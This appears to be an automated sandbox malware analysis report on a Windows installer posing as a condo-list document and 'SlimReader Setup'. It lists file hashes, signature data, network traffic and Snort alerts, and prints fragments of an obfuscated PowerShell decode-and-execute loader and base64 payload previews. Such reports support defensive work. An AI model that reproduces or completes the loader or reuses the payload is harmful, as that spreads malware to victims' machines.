File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2108
Entropy (8bit):	5.349501028514494
Encrypted:	false
SSDEEP:	48:BZLvheoO0DqDYB1ZhZmvheoO0DqDYB1ZyNufZ62pfxKZ62pfxT:BZLheNaqDo1ZhZKheNaqDo1Z6uB6u06o
MD5:	21B1C29F1CEDBD7036D6E9F62514983F
SHA1:	720F0F6B076DB04A88888F7F9E28810A577B7E89
SHA-256:	6B3DB5A0D0E36D2E22E7E777729EA0F8E9AA68598879F021629CC9EF2006896F
SHA-512:	F7024E32451303A3D1F81ABF1769CE268F553D37EF36857654D26EC03928BE11D0450CD92CB8B722F3F1A8A4C7286D50968459758C4E20D3B57C6226EFA71DC1
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210828000558..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell..Process ID: 6584..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20210828000559..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell..Process ID: 6584..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSMa

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.gRShAM7L.20210828000505.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	18114
Entropy (8bit):	5.605109377221424
Encrypted:	false
SSDEEP:	384:f8LU3p08LU3p/8LU3pN84Y3dY3Xk3j8LU3pv858JJT8JJT8v98LU3pewFFw8LU3D:AWDWgWrWxYbWewFFfW5tGY
MD5:	A3CCD14FE04082D81F054E63308812D8
SHA1:	D9DC2DA919DF0C6CF96F106A0B31625D5BB014FB
SHA-256:	47944F00DE8377E0BC0ED41C97360C80ED9928E1BE44851F9E30708003DECEAB
SHA-512:	C3B32E725EF88B85503594FA8BD1358D2485A9FF46D32D9B23A767D6F08C291A9BB232E47D904BD3B228EFF29CFC95A7290EF5F7C3A304627CDCA92E8B3D4051
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.gRShAM7L.20210828000505.txt, Author: Joe Security
Reputation:	unknown
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210828000507..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.n4qSLmb6.20210828000459.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	4139
Entropy (8bit):	5.644532028415382
Encrypted:	false
SSDEEP:	96:BZlheNA8TnUpBxfak02dqDo1Zq8TnUpBxfak02btEdXRX2+ZXkRvJXzXMBZXkRvZ:x8TnU3xfakT28TnU3xfakTbtE3W14W1Z
MD5:	17CB12798FBB60F5EDBD45921EF72C40
SHA1:	5613E1FE3B5164F9BB31F379F10111FD4DF7A8B8
SHA-256:	1FFF522A26FBBCBB323FD7AFEE3326E4DD1E613347829D27C5A58D48C5CA463C
SHA-512:	9319A8EDFA472B9CD8D03DD573F7A802E02E8299D7F5CA1B358C657EEF8F625D1969E0522E64D29C4AD82A612888F009BC12D91C51C05D42F4AAB9E3F70EE9AE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.n4qSLmb6.20210828000459.txt, Author: Joe Security
Reputation:	unknown
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210828000501..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.v_HVHUJJ.20210828000559.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2108
Entropy (8bit):	5.341896301468397
Encrypted:	false
SSDEEP:	48:BZOvheoO0KqDYB1ZhZOvheoO0KqDYB1Z3ufZ62pfxKZ62pfxT:BZiheNvqDo1ZhZiheNvqDo1Z3uB6u06o
MD5:	517FB53EFFF67CB80C6CC9B60E53DAC4
SHA1:	15FF87BA83F19641B29C80E06E0EC9773B864AC8
SHA-256:	3CD0B2657222694D9E43527D48BC9C208BF80705C289F6D146FBB8B69E8AD76C
SHA-512:	94FBED769B576A1E1CC24B4199FF42AF011510EF1492DE5133F18043201558B4520F0916C4241B505A911DEDDE542BE392E4FD923E3A4BDC91E5D1758E97FB2C
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210828000601..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell..Process ID: 3476..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20210828000601..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell..Process ID: 3476..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSMa

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.yMoqxbtf.20210828000615.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	48:BZevheoO0hqDYB1ZhZsvheoO0hqDYB1ZSH9pJ1vqAfG7eJ1vqAfG7d:BZSheN8qDo1ZhZ8heN8qDo1ZSdpTvTuf
MD5:	7794FF8B868259E553F4B5B3369AA07A
SHA1:	A6EE20E3EAF0ABF762F0E5C6DCE916589EA9F932
SHA-256:	23265953701A1095A1812E0A3CE5ACAEDA585B5F32E0A3C2515D19B0931D7952
SHA-512:	E84116D832F7DFB4C457DAE4BF62251E3F2BFB593E4D0071E95BB33FE05B7AD40C20D86993E518C87E0758AC747C1A7016DD3B6B98E3603F968A8B534A598DB8
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210828000616..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell..Process ID: 5352..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20210828000841..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell..Process ID: 5352..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSMa

C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610 Download File
Process:	C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	67756
Entropy (8bit):	5.725745924531966
Encrypted:	false
SSDEEP:	1536:JDOs355yymmEeRPDcJytgdmxa2dAEslokZLM4kEbQWQvFH0i8n:JDLTTE0FBxiE9XE8hiFn
MD5:	25D1B8AAB3AC4F8A9E44E5B470818DF6
SHA1:	3AE880B40C06A0C14092E25729BA03E7769DD365
SHA-256:	70D5FA6EFCD01C196D1BA1A6207B47FE5457D4AEB3105DF561A462570F79BB04
SHA-512:	6AB29E4B241933F8FFBF85535D79E88AF32D198EC43B8EDEB3AB08DC6C55EAD5898CEE8DDBD60C960FE6E894A80A9E68187DD74664FFF9189BA629A379CC6497
Malicious:	true
Reputation:	unknown
Preview:	aDAPXQsxZiEjEkx6RVB8S340V1cuLDd/MUIQZnEiekMwC0h0DCwILRQgEwAMDl9fKDwdKik0Wj0nAAQpE0McHDcJGEcrPREbGiEVGxoYHmUbcis3Nh4pAwcUAA0gBSVcDjYCGCILHRkoFA8mP2RmcXA3GAYQIj4/fTwaKnw1PnoyPTc9JAsvVD0zDAoYPxQSMBIcNggJNAwnGxoVDWAPCCAGHzAAGzkQMDFzCh4VIzcCIWIhESEnMwEFAVIvaV4FBC8EbCMDTxYNDQkXIiYJFQ0EMTAmMTsMIyQ6IzwJEwQZPCASBS4/HQ0aLxURGTRULDo9LxsXIj0sLB8POAgWFiwpCS4DFjEnChEiEXAbQTolDgQcGwEsLysIBSY2Jz9lGhcvIyloIQ0DLgQSJS4HLA02Al8nCE8hHT09JSQuBHEQJRwoJ1UiKwIZIC8efDc6BBwBExQUKz0dEQsWAxY2HiADIQULNgonFCc3DAEUIT4wPh9yCiA8ECAOOSEDEg4jEhURHAU6QCYMCS8MLx8+cAAvNWw6WjkpFTQwOgsITCcWCD0pJAIqBhIjTRgjMhgbGBFXEix9HRw1QSc4FQQdUS4PPnUbLSIAEy4lOQwrDlkVNzcqLwRTEyYAPikgJj15KFUQNCsAMDYSBwkFDUE3YBpzdlQqaRMcARA2Mxc9QgE4OzQECyozNQEZAzA+EzE0EyYiDiQwJUANAyczHiESezgnQBoMBwUqNw01EiZKWWsvWh9eDzUsORInLwQBOypbOgAcMBM4Jh4gDDo/ATERBgQLFSoyHB4nES8BKk1oCHEDLCI5IwU4GQwJJA4LCg4VHwc9ASdkawomNCUHIwgYQRoFDSMeCwYFBBw/JhAUDlAiKB8zBhYqHSIFDyEiNA4tH39IGhYGMRg4Oj4ZEjUuDTQwIiUrPVMoHyQVEQVBJz8WLDMnLgxTPBsiDRpHWQc2CVICHBwcLzUWYxsjCGQ2FTMkMiYUA3sJGD00ORoY

\Device\ConDrv Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	768:KlLa0OsXzMCeKoSij+qsVOvNeORaxc5u3hEhwo4aN7Om1ISVsgm+:6LakJeKoSJqcOvN35u3hEhw9apBIyd
MD5:	F41425F82E770AC100B79A0DE83048BF
SHA1:	12C53A324EF34B859BF67F9F965CD6BBA26182F1
SHA-256:	8FF73ECC8E40395D5A60B6C01AB9E554CF5CA0BFCF132D38722ABF5257D333A8
SHA-512:	6B29B0B6D7C51C3D865E0AABF11338C52A087ED17FFA79B204E2A9808D3DFF24FB4D15C9CBBC007C999EDD50781DF90FDA421DCA97BF2087DAD2A470B7F0CD55
Malicious:	false
Reputation:	unknown
Preview:	$ab44bf26d45423920b6bcb8f1c63c='HBLJb0lUWmVRV2RTm5RCK9x5VmxRREZOEW5sbWVGWllWbTgwUFVOeWNYQnlTVEJ5YVRZbVgyMTZTekpv41cwal1x4D1m53mMcotLOKtLFgczH20aOToPBDQBSAY3XTsFPnMwFEQeElpzMQZQEAsRFwxcCDR3Y1dgRlRkOFBsUm4BATRtATM6VeXJFxhhRzAxYkVkdLlVM29uVmNOWapwTWVAUTlkWGQ2+u5BOUt3eEROqU5lVUdGaFB1QjhLRG81XGpGSU9DazheV3BCVW10bGFVbnlkbmN4ZUZGeFJHOMhJMnN4V0cxMWFFY3lSQ04xSTBWRUpYQnlXakU5ZFNWSDXUTnoYejA3Sq5RcUFFUmdja3cyU1QxcVptNUJmWGN4UaVSWmhFYzBiRHh0ZUVFbFVIVlpiUT09UUhZb0pUWmVVV2RTZGtCK2R5VmxRREZOUW5sbWVGWllWTTgwWFVOeWNYQnlTVEJ5aXRZbRAyMTZTekpvY1cwan0aP0sSU3BB56tKdGZKQm9a9k1qS1dodlVsaGVWM1VqSlNScURsZ1R9KhsCN0RCN3kwbFFZrlpqYlBkOFDwUm5RRDRtTTI5VVlVMXkhRzBxTDcBGDY2MU5pV2hOWdBwTWVEUTlk+GQ2VFZBOUtXeEROaU5lFUdGOlBVQjhLRm81WGpGSU9DazjK73BCVW10bClVb3lmbGZ4RT9GeGV4eE1IMmN4V1cxMWFFc3lSU04xSTBWRVpYQnlXakU5ZFNWSGFsTnpPejA3Sm5RcVlGUmdja3cyU1QxcUldN0JzWGN4UUVSWmZgSzZiRHJ3GERFbFFKUidgUT05e0hZb1lkW2VSV2RTZGtCK2YCV2xRQGxOQl5tbWJGWllWbTgwUi5MeWNcaHlIZEB54FRZbVkyMSdTeTH8Y1c0BURuWjkUjXZBI1wKdGZgVJFYerNrQFJFdH4xaGc5clVqQF95X3Zu

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.99440427005356
TrID:	Win32 Executable (generic) a (10002005/4) 98.45% Inno Setup installer (109748/4) 1.08% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	Freddie-Mac-Warrantable-Condo-List.exe
File size:	103560224
MD5:	ae5b37182059c7733466788212370e71
SHA1:	e6b0ee285d7042834d23743ad8ca188082ac264f
SHA256:	44af59a2d70ba23f2f80d80090d11184ef923a746c0c9ea3c81922bd8d899346
SHA512:	32cffc0422bc641dc7a5537e0b809ed6ed5540fb4b0876d4158ee01217ccaf04d68bf6547b1ae3a79da3e168e10f5c3d7d6cde219705fb9eeaaeecc4d8ba7c7f
SSDEEP:	196608:NppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppC:6oLi
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	74f4f4dce4f2e4e4

Static PE Info

General
Entrypoint:	0x4b5eec
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60B88E27 [Thu Jun 3 08:09:11 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	5a594319a0d69dbc452e748bcf05892e

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
Error Number:	-2146762495
Not Before, Not After	8/25/2021 5:00:00 PM 8/24/2022 4:59:59 PM
Subject Chain	CN=Full Stack s. r. o., O=Full Stack s. r. o., L=Bratislava, C=SK, SERIALNUMBER=53 958 748, OID.1.3.6.1.4.1.311.60.2.1.3=SK, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	B6076F74572111FFBFD755C8D98F21E7
Thumbprint SHA-1:	160A9CF7400D11BEFFD349F47136264EE56B6686
Thumbprint SHA-256:	9F5A6811259566D82B89ECA78CA84B0B21AEFD783616E1142ED006C67707F892
Serial:	0C6B875DE4F598244A6D6751ABFBDFBD

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004B10F0h
call 00007F4F80C81DF5h
xor eax, eax
push ebp
push 004B65E2h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004B659Eh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004BE634h]
call 00007F4F80D2451Fh
call 00007F4F80D24072h
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F4F80C97868h
mov edx, dword ptr [ebp-14h]
mov eax, 004C1D84h
call 00007F4F80C7C9E7h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004C1D84h]
mov dl, 01h
mov eax, dword ptr [004237A4h]
call 00007F4F80C988CFh
mov dword ptr [004C1D88h], eax
xor edx, edx
push ebp
push 004B654Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F4F80D245A7h
mov dword ptr [004C1D90h], eax
mov eax, dword ptr [004C1D90h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F4F80D2AB8Ah
mov eax, dword ptr [004C1D90h]
mov edx, 00000028h
call 00007F4F80C991C4h
mov edx, dword ptr [004C1D90h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xc4000	0x9a	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2000	0xf36	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0xf57c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62c0f98	0x2488
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc6000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc22e4	0x244	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xc3000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb361c	0xb3800	False	0.344863934105	data	6.35605820433	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext	0xb5000	0x1688	0x1800	False	0.544921875	data	5.97275005522	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0xb7000	0x37a4	0x3800	False	0.360979352679	data	5.04440056201	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0xbb000	0x6de8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0xc2000	0xf36	0x1000	False	0.3681640625	data	4.89870464796	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.didata	0xc3000	0x1a4	0x200	False	0.345703125	data	2.75636286825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.edata	0xc4000	0x9a	0x200	False	0.2578125	data	1.87222286659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xc5000	0x18	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0xc6000	0x5d	0x200	False	0.189453125	data	1.38389437522	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc7000	0xf57c	0xf600	False	0.254176194106	data	4.75187303433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc7588	0x18de	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0xc8e68	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4294905600	English	United States
RT_ICON	0xcd090	0x25a8	data	English	United States
RT_ICON	0xcf638	0x1a68	data	English	United States
RT_ICON	0xd10a0	0x10a8	data	English	United States
RT_ICON	0xd2148	0x988	data	English	United States
RT_ICON	0xd2ad0	0x6b8	data	English	United States
RT_ICON	0xd3188	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_STRING	0xd35f0	0x360	data
RT_STRING	0xd3950	0x260	data
RT_STRING	0xd3bb0	0x45c	data
RT_STRING	0xd400c	0x40c	data
RT_STRING	0xd4418	0x2d4	data
RT_STRING	0xd46ec	0xb8	data
RT_STRING	0xd47a4	0x9c	data
RT_STRING	0xd4840	0x374	data
RT_STRING	0xd4bb4	0x398	data
RT_STRING	0xd4f4c	0x368	data
RT_STRING	0xd52b4	0x2a4	data
RT_RCDATA	0xd5558	0x10	data
RT_RCDATA	0xd5568	0x2c4	data
RT_RCDATA	0xd582c	0x2c	data
RT_GROUP_ICON	0xd5858	0x76	data	English	United States
RT_VERSION	0xd58d0	0x584	data	English	United States
RT_MANIFEST	0xd5e54	0x726	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
netapi32.dll	NetWkstaGetInfo, NetApiBufferFree
advapi32.dll	RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x454060
__dbk_fcall_wrapper	2	0x40d0a0
dbkFCallWrapperAddr	1	0x4be63c

Version Infos

Description	Data
LegalCopyright	(c) InvestTech
FileVersion
CompanyName
Comments	This installation was built with Inno Setup.
ProductName	SlimReader
ProductVersion	1.4.1.2
FileDescription	SlimReader Setup
OriginalFileName
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/28/21-00:06:58.157702	TCP	100000122	COMMUNITY WEB-MISC mod_jrun overflow attempt	49730	80	192.168.2.3	5.254.118.226
08/28/21-00:07:00.328000	TCP	100000122	COMMUNITY WEB-MISC mod_jrun overflow attempt	49730	80	192.168.2.3	5.254.118.226
08/28/21-00:07:10.532834	TCP	100000122	COMMUNITY WEB-MISC mod_jrun overflow attempt	49750	80	192.168.2.3	5.254.118.226
08/28/21-00:07:11.078838	TCP	100000122	COMMUNITY WEB-MISC mod_jrun overflow attempt	49750	80	192.168.2.3	5.254.118.226

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2021 00:05:53.768105984 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:53.890932083 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:53.891057014 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:53.892266035 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:54.014794111 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:54.014910936 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:54.139982939 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:54.431802034 CEST	80	49714	167.88.15.115	192.168.2.3
